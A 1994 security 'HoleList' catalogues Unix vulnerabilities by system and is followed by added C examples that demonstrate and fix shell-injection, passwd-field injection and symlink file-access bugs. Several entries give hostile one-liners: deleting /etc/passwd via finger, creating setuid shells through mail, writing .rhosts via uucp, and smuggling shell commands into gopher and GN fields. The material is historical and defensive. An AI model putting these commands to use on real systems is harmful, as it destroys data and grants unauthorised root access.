From HoleList FAQ
Subject: HoleList v7 12/13/94

These bugs/holes are archived only as a record of security-related activity and are for educational purposes only. This compilation is not meant to encourage malicious activity and is not intended to be a cookbook of cracking material. If you know of a hole or bug that is related to security and that is not listed in the following list, please contribute by sending e-mail to .

---
From: HoleList
Subject: Holes'n'Bugs
Date: 03/03/94

Operating System RVP Date     Description (References)
================ === ======== ================================================
/bin/sh          1-- 12/12/94 IFS hole, vi ()
/bin/su          1--          overwrite stack somehow? ()
/dev/fb          1--          frame buffer devices readable/writeable, ()
/dev/kmem        1--          /dev/kmem should not be o+w ()
/dev/mem         1--          /dev/mem should not be o+w ()
/dev/*st*, *mt*  1--          generally world readable/writeable ()
/etc             1--          rexd + MACH ? [NeXT] /etc/ g+w daemon ()
4.3 Tahoe        1--          chfn -- allows newlines/meta chars/bufsize ()
4.3 Tahoe        1--          ttyA&B;A:cat zeros out passwd file ()
BSD 4.1          1--          Sendmail can mail directly to a file
BSD 4.1          1--          can mail directly to a file
BSD 4.1          1--          run set gid program, dump core, is set gid
BSD 4.1          1--          lock- compiled password "hasta la vista", + ^Z ()
BSD <4.2?        1--          IFS w. preserve bug in vi ()
BSD 4.1          1--          mail directly to a file ()
BSD 4.1          1--          exec sgid program, dump core, core is sgid ()
BSD 4.1          1--          Sendmail: can mail directly to a file ()
BSD 4.1          1--          lock password "hasta la vista" backdoor ()
BSD <4.2         1--          IFS w/ preserve bug w/vi ()
BSD <4.2         1--          suspend mkdir, ln file you want to dir ()
BSD <4.2?        1--          suspend mkdir, ln file you want to dir ()
BSD 4.2          1--          lock -- compiled in password "hasta la vista" ()
BSD 4.2          1--          ln passwd file to mail spool, mail to file ()
BSD 4.2          1--          can truncate read only files ()
BSD 4.2          1--          finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
BSD 4.2          1--          ln -s target ~/.plan; finger user to read file ()
BSD 4.2          1--          lpr file; rm file; ln -s /any/filename file ()
BSD 4.2          1--          adb su; change check in memory; shell out ()
BSD 4.2          1--          race condition, can get root via "at" ()
BSD 4.2          1--          ln passwd file to mail spool, mail user ()
BSD 4.2          1--          ln -s target ~/.plan; finger user. ()
BSD 4.2          1--          adb su; change check in memory; shell out; su ()
BSD 4.2          1--          /dev/kmem and /dev/mem should not be o+w ()
BSD 4.2          1--          signal any process by changing process group ()
BSD 4.3          1--          ftp -n; quote user ftp; etc. Gets root privs. ()
BSD 4.3          1--          lpd can overwrite file ()
BSD 4.3          1--          ln -s /any/suid/file -i ; -i Get suid shell. ()
BSD 4.3          1--          fchown (2) can chown _any_ file ()
BSD 4.3          1--          race condition, get root via "at" ()
BSD 4.3          1--          passwd chokes on long lines, splits pw file ()
BSD 4.3          1--          ftp -n; quote user ftp; cd ~root, get root ()
BSD 4.3          1--          race condition (expreserve?), root via "at" ()
BSD 4.3          5--          lpr -s; 1000 calls lpr re-use fname ()
BSD NET/2        5--          rdist(1) uses popen(3), IFS spoof ()
BSD NET/2        5--          lpr -s; 1000 calls lpr re-use fname ()
BSD ?            1--          Overwrite gets buffer -- fingerd, etc
BSD ?            1--          uudecode alias can overwrite root/daemon files ()
BSD ?            1--          /bin/mail ; !/bin/sh Get uid=bin shell ()
BSD ?            1--          rwall bug ()
BSD ?            1--          adb the running kernel, shell out and get root ()
BSD ?            1--          sendmail can mail non-root file, try twice ()
BSD ?            1--          rshd -- spoof via nameservice, rsh target -l uid
BSD386           1--          mail";cp /bin/sh /tmp;chmod 6777 /tmp/sh" ()
buffer overrun   1--          chfn ()
chfn, chsh       1--          used to create a root account ()
chmod            1--          Incorrect file or directory permissions ()
comsat           1--          running as root, utmp o+w, writes to files ()
core             1--          will system dump a setgid core image? ()
decode           1--          decode mail alias - write non-root user files ()
DellSVR3.2/1.0.6 1--          Bad prot mode allows root if have sh + cc ()
denial           1--          easy to hog processor, memory, disc, tty, etc ()
DomainO/S <=10.3 1--          break root by using s/rbak; sgid/suid ()
DomainO/S <=10.4 5--          sendmail mail to programs ()
DNS              1--          SOA can control bogus reverse ip, rhosts ()
Domain/OS <10.3  1--          break root by using s/rbak; setgid/uid ()
DYNIX 3.0.14     1--          Sendmail -C file ==> displays any file. ()
DYNIX 3.?        1--          can get root on NFS host via root via mountd ()
DYNIX 3.?        1--          on non-trusted host due to bug in mount daemon ()
DYNIX ?          1--          rsh -l "" runs as root ()
DYNIX ?          1--          login: -r hostname ruser^@luser^@term^@ ()
elm              5--          ELM's autoreply can be used to get root ()
expreserve       1--          can be a huge hole ()
ESIX Rev. D      1--          Bad protected mode allows root if sh+cc ()
file mod test    1--          test file doesn't lose the suid when modified ()
fsck             1--          lost+found should be mode 700 ()
ftpd             1--          static passwd struct overwrite, wuftp < x.xx ()
ftpd 4.2         1--          userid not reset properly, "user root" ()
ftpd ?           1--          core files may contain password info ()
fchown           1--          test for bad group test ()
ftruncate        1--          can be used to change major/minor on devices ()
fingerd          1--          .plan hard-links - read files, fingerd ()
gopher           6--          Type=8 Name=shell Host=;/bin/sh Port= Path= ()
gnuemacs         1--          emacsclient/server allows access to files. ()
GN <1.19         4+-          exec0::/path/prog?var=blah%0Ahack-commands%0A ()
HDB              1--          nostrangers shell escape ()
HDB              1--          changing the owner of set uid/gid files ()
HDB              1--          meta escapes on the X command line ()
HDB              1--          ; breaks on the X line ()
hosts.equiv      1--          default + entry ()
hosts.equiv      1--          easy to spoof by bad SOA at remote site ()
HPUX <7.0        1--          chfn -- allows newlines, etc ()
HP-UX            1--          sendmail: mail directly to programs ()
HPUX A.09.01     1--          sendmail: mail directly to programs ()
HPUX ?           1--          Sendmail: versions 1.2&13.1 sm, -oQ > ()
IDA 1.4.4.1      1--          :include:/some/unreadable/file in ~/.forward ()
ICMP             4--          various icmp attacks possible ()
ICMP             1--          ICMP redirect packets change non-static routes ()
Interactive 2.x  1--          Bad protected mode allows root if sh+cc ()
IRIX 3.3         1--          any user can read any other user's mail. ()
IRIX 3.3.1       1--          any user can read any other user's mail. ()
IRIX 3.3/3.31    1--          sendmail- any user can read other user's mail ()
IRIX 4.0.X       1--          default suid scripts ()
IRIX 4.0.X       1--          various $PATH problems ()
IRIX 4.0.X       1--          sendmail race condition hole ()
IRIX 4.0.X       1--          lpd is vulnerable too ()
IRIX ?           1--          rsh -l "" runs as root ()
IRIX ?           1--          login: -r hostname ruser^@luser^@term^@ ()
IRIX ?           1--          Overwrite gets buffer -- fingerd, etc ()
IRIX ?           1--          uudecode alias can overwrite root/daemon files ()
IRIX ?           1--          /bin/mail ; !/bin/sh Get uid=bin shell ()
IRIX ?           1--          rwall bug ()
IRIX ?           1--          adb the running kernel, shell out and get root ()
IRIX ?           1--          mail to any non-root owned file, try twice ()
IRIX ?           1--          rshd- spoof via dns - rsh target -l uid ()
IRIX ?           1--          xwsh log hole? (yo)
kernel           1--          Race conditions coupled with suid programs ()
lock             1--          4.1bsd version had password "hasta la vista" ()
lost+found       1--          lost+found should be mode 700 ()
lpd              1--          overwrite files with root authority ()
lpr              1--          lpr -r access testing problem ()
lpr              5--          lpr -s; 1000 calls lpr re-use fname ()
lprm             1--          trusts utmp ()
mount            1--          "mount" should not be +x for users. ()
mqueue           1--          must not be mode 777! ()
movemail         1--          worm? ()
Microport 3.0    1--          ulimit 0; passwd ==> zeros out passwd file ()
network          1--          BSD network security based on "reserved ports" ()
news             1--          news receivers may execute shell commands ()
network          1--          kerberos ()
network          1--          Networks are usually very insecure. ()
NFS              1--          Many systems can be compromised with NFS/RPC. ()
NFS              1--          proxy rpc can read remote nfs files ()
NFS              1--          can generate NFS file handles ()
OSF/1 1.2        1--          write allows shell outs to gain egid term ()
OSF/1 1.3        1--          write allows shell outs to gain egid term ()
OSF/1 1.2        1--          doesn't close the fd to the term writing to ()
OSF/1 1.3        1--          doesn't close the fd to the term writing to ()
passwd           1--          fgets allows entries mangled into ::0:0::: ()
passwd           1--          fred:...:...:...:Fred ....Flintstone::/bin/sh ()
passwd           1--          IDs shouldn't contain: ;~!` M- spoof popen ()
portmap          1--          binding problems... ()
root             1--          ? (fingerd_test.sh)
rcp              1--          nobody problem ()
rexd             1--          existence ()
rexd             1--          MACH ? [NeXT] /etc/ g+w daemon ()
rdist            1--          buffer overflow ()
rdist            5--          rdist(1) uses popen(3), IFS spoof ()
RISC/os 4.51?    1--          rsh -l "" runs as root ()
RPC              1--          Many systems can be compromised with NFS/RPC. ()
rwall            1--          running as root, utmp o+w, writes to files ()
SCO 3.2v4.2      5--          rdist(1) uses popen(3), IFS spoof ()
SCO ?            1--          rlogin to any acct to trusted host w/o pwd ()
SCO ?            1--          rlogin to any acct from trusted host w/o pwd ()
selection_svc    1--          allowed remote access to files ()
sendmail                      && bounce mail ()
sendmail <=5.61  1--          can mail to any file not root owned, try twice ()
sendmail <5.61   1--          sendmail- groups incorrectly, get group ()
sendmail >5.65   1--          can get daemon privileges via .forward. ()
sendmail ?       5++          can mail to programs (sendmal1, nmh, smail)
sendmail ?       1--          debug option ()
sendmail ?       1--          wizard mode ()
sendmail ?       1--          TURN command allows mail to be stolen ()
sendmail ?       1--          decode mail alias - write non-root user files ()
sendmail ?       1--          buffer overflow causes sendmail daemon lock-up ()
sendmail ?       1--          what uid does |program run with? ()
SIGNALS          1--          signal any process by changing process group ()
Stellix 2.0?     1--          rsh -l "" runs as root ()
Stellix 2.0      1--          rsh -l "" runs as root ()
Stellix 2.1      1--          login: -r hostname ruser^@luser^@term^@ ()
suid             1--          will run .profile if linked to - , IFS ()
suid             1--          never call system(3) and popen(3) ()
suid             1--          May not expect filesize signals, SIGALRMs ()
suid             1--          no setuid program on a mountable disk ()
suid             1--          ro mounting of foreign disk may allow suid. ()
suid             1--          .plan links ()
suid             1--          /usr/ucb/mail ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh ()
SunOS 3.3        1--          ftpd - userid not reset properly, "user root" ()
SunOS 3.5        1--          connect w/acct;user root;ls;put /tmp/f/ tmp/b ()
SunOS <4.0       1--          any user can run yp server ()
SunOS 4.0        1--          chsh -- similar to chfn ()
SunOS 386i       1--          rm logintool, hack login with adb, chmod 2750 ()
SunOS 386i/4.01? 1--          login -n root requires no password ()
SunOS 386i/4.01? 1--          login -n root (no password) ()
SunOS 4.0.1      1--          chfn buffer problems ()
SunOS 4.0.1      1--          chsh buffer problems ()
SunOS 4.0.1      1--          ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3      1--          ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3      1--          concurrent yppasswd sessions can trash yp map ()
SunOS 4.0.3      1--          mail to any non-root owned file, try twice ()
SunOS 4.0.3      1--          rcp buffer overflow ()
SunOS 4.0.3      1--          sendmail- mail to non-root file, try twice ()
SunOS 4.0.3      1--          ttyA&B;A:cat can r/w any ()
Ultrix 2.0?      1--          Sendmail -C file ==> displays any file. ()
Ultrix 2.2?      1--          Sendmail -C file ==> displays any file. ()
Ultrix 2.2       1--          ln passwd file to mail spool, mail to user ()
Ultrix 2.2       1--          on a non-trusted host due to bug in mountd ()
Ultrix 2.2       1--          Sendmail: -C file ==> displays any file ()
Ultrix 2.2       1--          can get root on NFS host via root via mountd ()
Ultrix 2.2       1--          get root on host running NFS from other root ()
Ultrix 3.0       1--          lock -- compiled in password "hasta la vista" ()
Ultrix 3.0       1--          login -P progname allows run programs as root ()
Ultrix 3.0       1--          login can run any program with root privs ()
Ultrix 3.0       1--          ln -s target ~/.plan; finger user to access ()
Ultrix 3.0       1--          any user can mount any filesystem ()
Ultrix 3.0       1--          X11 doesn't clear pwds in mem; /dev/mem is o+w ()
Ultrix <3.1      1--          limit file 0; passwd --> zeros out passwd file ()
Ultrix <3.1      1--          lpd can overwrite any file (back to 2.0?) ()
Ultrix 3.1?      1--          rshd: spoof via nameservice, rsh target -l uid ()
Ultrix 3.1?      1--          allows newlines, meta chars, bufsize problem ()
Ultrix <4.1      1--          overflow RISC reg buffer, get root w/ mail ()
Ultrix ?         1--          rshd -- spoof via dns, rsh target -l uid ()
Ultrix ?         1--          ypbind takes ypset from all; spoof yp DB ()
Ultrix ?         1--          yppasswd leaves yp data files world writable ()
Ultrix ?         1--          chfn -- allows newlines, meta chars, bufsize ()
Ultrix ?         1--          ftp -n; quote user ftp; etc. Gets root privs ()
Ultrix ?         1--          can change host name, mount any filesystem ()
Ultrix ?         1--          uudecode alias can overwrite root/daemon files ()
Ultrix ?         4--          ICMP not handled correctly (nuke)
Ultrix ?         1--          emacsclient/server allows access to files ()
Ultrix ?         1--          lock: password "hasta la vista" backdoor ()
Ultrix ?         1--          /dev/kmem and /dev/mem should not be o+w ()
Ultrix ?         1--          can change physical ethernet address ()
UNIX             1--          / must not be go+w ()
utmp             1--          etc/utmp o+w ? ()
utmp             1--          check to see if world writeable (rwall, comsat)
utmp             1--          syslog messages can overwrite any file ()
uucp             1--          check valid UUCP accts in the /etc/ftpusers ()
uucp             1--          echo "myhost myname">x;uucp x ~uucp/.rhosts ()
uucp             1--          uucico shows ph num, login, passwd, of remote ()
uudecode         1--          if it is setuid, may create setuid files ()
uusend           1--          uusend may call "uux" while suid to root ()
uux              1--          uusend may call "uux" while suid to root ()
X11R?            1--          snoop on keyboards and bitmaps ()
X11R3            1--          can set log on and exec (fixed in "fix-6")
X11R4            1--          can set log on and exec (fixed in "fix-6")
X11R ?           1--          snoop on keyboards and bitmaps ()
X11R5            5++          xterm can create files (xterm1__)
xhost            1--          if + , anyone can connect to X server ()
ypbind           1--          accepts ypset from anyone ()
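The finger "string|/bin/rm -f /etc/passwd"@foo.bar entry, the rdist(1)/popen(3) IFS spoof entries, the "passwd: IDs shouldn't contain ;~!` ... spoof popen" entry and the rule "suid: never call system(3) and popen(3)" all describe one mistake: user-controlled text reaches /bin/sh, which then honours IFS, PATH and metacharacters such as |, ;, ` and newline. The C program that follows is an added example written for this page; it is not part of the HoleList and not any vendor's finger(1) or rdist(1), and the function and variable names are mine. It shows the command string the vulnerable pattern produces (built, never run), a positive-list check for login names, and a replacement for popen(3) that runs an absolute path through fork/execve with a fixed environment, so no shell is involved at all.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* The vulnerable shape: the name supplied by the remote user is pasted into a
 * string that /bin/sh will parse. finger "string|/bin/rm -f /etc/passwd"@host
 * therefore runs rm with the daemon's privileges. Built here, never executed. */
int vulnerable_finger_cmd(const char *user, char *cmd, size_t cmdlen)
{
    return snprintf(cmd, cmdlen, "finger %s", user);
}

/* Positive check of a login name (my rule, not any vendor's): a leading
 * lower-case letter, then only lower-case letters, digits, '_', '-' and '.',
 * at most 32 characters. Every shell metacharacter, space and newline lies
 * outside that set, which also covers the ";~!`" passwd entry above. */
int safe_username(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 32 || !islower((unsigned char)s[0])) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!islower(c) && !isdigit(c) && c != '_' && c != '-' && c != '.')
            return 0;
    }
    return 1;
}

/* Replacement for popen(3) in a privileged program: fork, execve an absolute
 * path with the argv given and a fixed environment, capture the child's
 * stdout. No shell runs, so the caller's IFS and PATH are never consulted.
 * Returns the child's exit status, 127 if exec failed, -1 on error. */
int run_fixed(const char *path, char *const argv[], char *out, size_t outlen)
{
    static char *const clean_env[] = { "PATH=/bin:/usr/bin", "IFS= \t\n", NULL };
    int fds[2], status;
    if (outlen == 0 || pipe(fds) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        close(fds[0]);
        if (dup2(fds[1], STDOUT_FILENO) < 0) _exit(127);
        close(fds[1]);
        execve(path, argv, clean_env);       /* argv is passed as-is, unparsed */
        _exit(127);
    }
    close(fds[1]);
    size_t used = 0;
    for (;;) {                               /* keep what fits, drain the rest */
        char scratch[256];
        int fits = used + 1 < outlen;
        ssize_t r = read(fds[0], fits ? out + used : scratch,
                         fits ? outlen - 1 - used : sizeof scratch);
        if (r <= 0) break;
        if (fits) used += (size_t)r;
    }
    out[used] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *evil = "string|/bin/rm -f /etc/passwd";   /* constructed input */
    char cmd[128], out[128];
    vulnerable_finger_cmd(evil, cmd, sizeof cmd);
    printf("shell would see: %s\n", cmd);
    printf("safe_username(evil) = %d, safe_username(\"fred\") = %d\n",
           safe_username(evil), safe_username("fred"));
    char *const av[] = { "echo", "fred", NULL };
    if (run_fixed("/bin/echo", av, out, sizeof out) == 0)
        printf("run_fixed captured: %s", out);
    return 0;
}
```

The two halves belong together: run_fixed removes the shell, and safe_username removes the hostile input before it reaches anything else (log files, utmp, the passwd file) that later programs might parse.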
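The chfn/chsh entries ("allows newlines/meta chars/bufsize", "used to create a root account") and the two passwd entries ("fgets allows entries mangled into ::0:0:::", "fred:...:...:...:Fred ....Flintstone::/bin/sh") are the same hole seen from two sides: a setuid editor writes a user-supplied GECOS string into /etc/passwd without refusing ':' and newline, so the user appends a record of their own with uid 0. The following C program is an added example, not from the HoleList and not any vendor's chfn; the lenient parser is my own approximation of an fgets()-based reader (an assumption, not a copy of any system's getpwent), and the passwd text is constructed for the demonstration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    char name[33];
    long uid, gid;
    char shell[128];
} pwrec;

/* What an unchecked chfn writes: the GECOS text goes into the line verbatim,
 * newline and colons included. Returns 0 on success, -1 if it did not fit. */
int write_passwd_line_unchecked(const char *name, long uid, long gid,
                                const char *gecos, const char *home,
                                const char *shell, char *line, size_t linelen)
{
    int n = snprintf(line, linelen, "%s:x:%ld:%ld:%s:%s:%s\n",
                     name, uid, gid, gecos, home, shell);
    return (n < 0 || (size_t)n >= linelen) ? -1 : 0;
}

/* Lenient reader in the spirit of the fgets()-based ones the list complains
 * about (my assumption of their behaviour): each newline-terminated line is
 * split on ':'; lines with fewer than seven fields are skipped, anything after
 * the seventh field is ignored. Returns the number of records stored. */
int parse_passwd(const char *text, pwrec *out, int max)
{
    int count = 0;
    const char *p = text;
    while (*p && count < max) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        char *f[7];
        int nf = 0;
        for (char *s = line; nf < 7; ) {
            f[nf++] = s;
            char *c = strchr(s, ':');
            if (!c) break;
            *c = '\0';
            s = c + 1;
        }
        if (nf == 7) {
            char *extra = strchr(f[6], ':');     /* eighth field onwards dropped */
            if (extra) *extra = '\0';
            pwrec *r = &out[count++];
            snprintf(r->name, sizeof r->name, "%s", f[0]);
            r->uid = strtol(f[2], NULL, 10);
            r->gid = strtol(f[3], NULL, 10);
            snprintf(r->shell, sizeof r->shell, "%s", f[6]);
        }
        p = nl ? nl + 1 : p + len;
    }
    return count;
}

/* How many accounts in the text would log in as root. */
int count_uid0(const char *text)
{
    pwrec recs[64];
    int n = parse_passwd(text, recs, 64), hits = 0;
    for (int i = 0; i < n; i++)
        if (recs[i].uid == 0) hits++;
    return hits;
}

/* What chfn must enforce before touching the file: no ':' (field separator),
 * no newline (record separator), printable ASCII only, bounded length. */
int gecos_ok(const char *gecos)
{
    size_t n = strlen(gecos);
    if (n > 80) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)gecos[i];
        if (c == ':' || c < 0x20 || c > 0x7e) return 0;
    }
    return 1;
}

int main(void)
{
    char line[256], file[512];
    const char *gecos = "Fred\nevil::0:0::/:/bin/sh";   /* constructed hostile input */
    write_passwd_line_unchecked("fred", 1000, 1000, gecos, "/home/fred", "/bin/sh",
                                line, sizeof line);
    snprintf(file, sizeof file, "root:x:0:0:root:/:/bin/sh\n%s", line);
    printf("%s", file);
    printf("uid 0 accounts: %d (gecos_ok would have returned %d)\n",
           count_uid0(file), gecos_ok(gecos));
    return 0;
}
```

The same check applies to chsh: a shell value that is not one of the allowed absolute paths must be refused outright, since a ':' inside it shifts every later field in the record.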
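Several entries are variants of one file-access bug in privileged daemons: "ln -s target ~/.plan; finger user to read file", "fingerd: .plan hard-links - read files", and the check-then-use window in "lpr file; rm file; ln -s /any/filename file". The C program below is an added example, not from the HoleList and not from any fingerd or lpr, showing how a daemon should open a file that a user controls: O_NOFOLLOW so a symlink fails the open itself, and fstat() on the descriptor it actually holds rather than stat() on the path, so the check and the read refer to the same inode. The function names are mine; the sample file and links are created under /tmp by the program itself.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a user-controlled file on behalf of a privileged daemon.
 *  - O_NOFOLLOW: a symlink at the final component fails the open (ELOOP),
 *    which is the "ln -s target ~/.plan" trick
 *  - O_NONBLOCK: a FIFO or device node left at that name cannot hang us
 *  - fstat on the open descriptor, never stat on the path: nothing can be
 *    swapped between the check and the read (the lpr rm/ln race)
 *  - regular file, owned by the user being served, link count exactly one:
 *    a hard link to someone else's file keeps that file's owner and fails the
 *    uid test; any file that has a second name elsewhere fails the nlink test
 * Returns a read-only descriptor, or -1 with errno set. */
int open_plan_safely(const char *path, uid_t owner)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_NOCTTY);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != owner || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Read at most buflen-1 bytes of the plan into buf (NUL-terminated).
 * Returns the byte count, or -1 if the file was refused. */
ssize_t read_plan(const char *path, uid_t owner, char *buf, size_t buflen)
{
    int fd = open_plan_safely(path, owner);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, buflen - 1);
    close(fd);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

int main(void)
{
    char real[] = "/tmp/holelist_plan.XXXXXX", lnk[64], buf[64];
    int fd = mkstemp(real);                      /* the user's genuine .plan */
    if (fd < 0) return 1;
    if (write(fd, "Out to lunch\n", 13) != 13) return 1;
    close(fd);
    snprintf(lnk, sizeof lnk, "%s.lnk", real);
    if (symlink(real, lnk) < 0) return 1;        /* "ln -s target ~/.plan" */
    printf("direct read: %zd bytes\n", read_plan(real, getuid(), buf, sizeof buf));
    printf("through symlink: %zd (%s)\n",
           read_plan(lnk, getuid(), buf, sizeof buf), strerror(errno));
    unlink(lnk);
    unlink(real);
    return 0;
}
```

Dropping privileges to the user before the open (seteuid, or a fork that setuid()s) is the other half of the fix and removes the need for the ownership test; the fstat-after-open discipline still applies, because a FIFO or device node is dangerous at any uid.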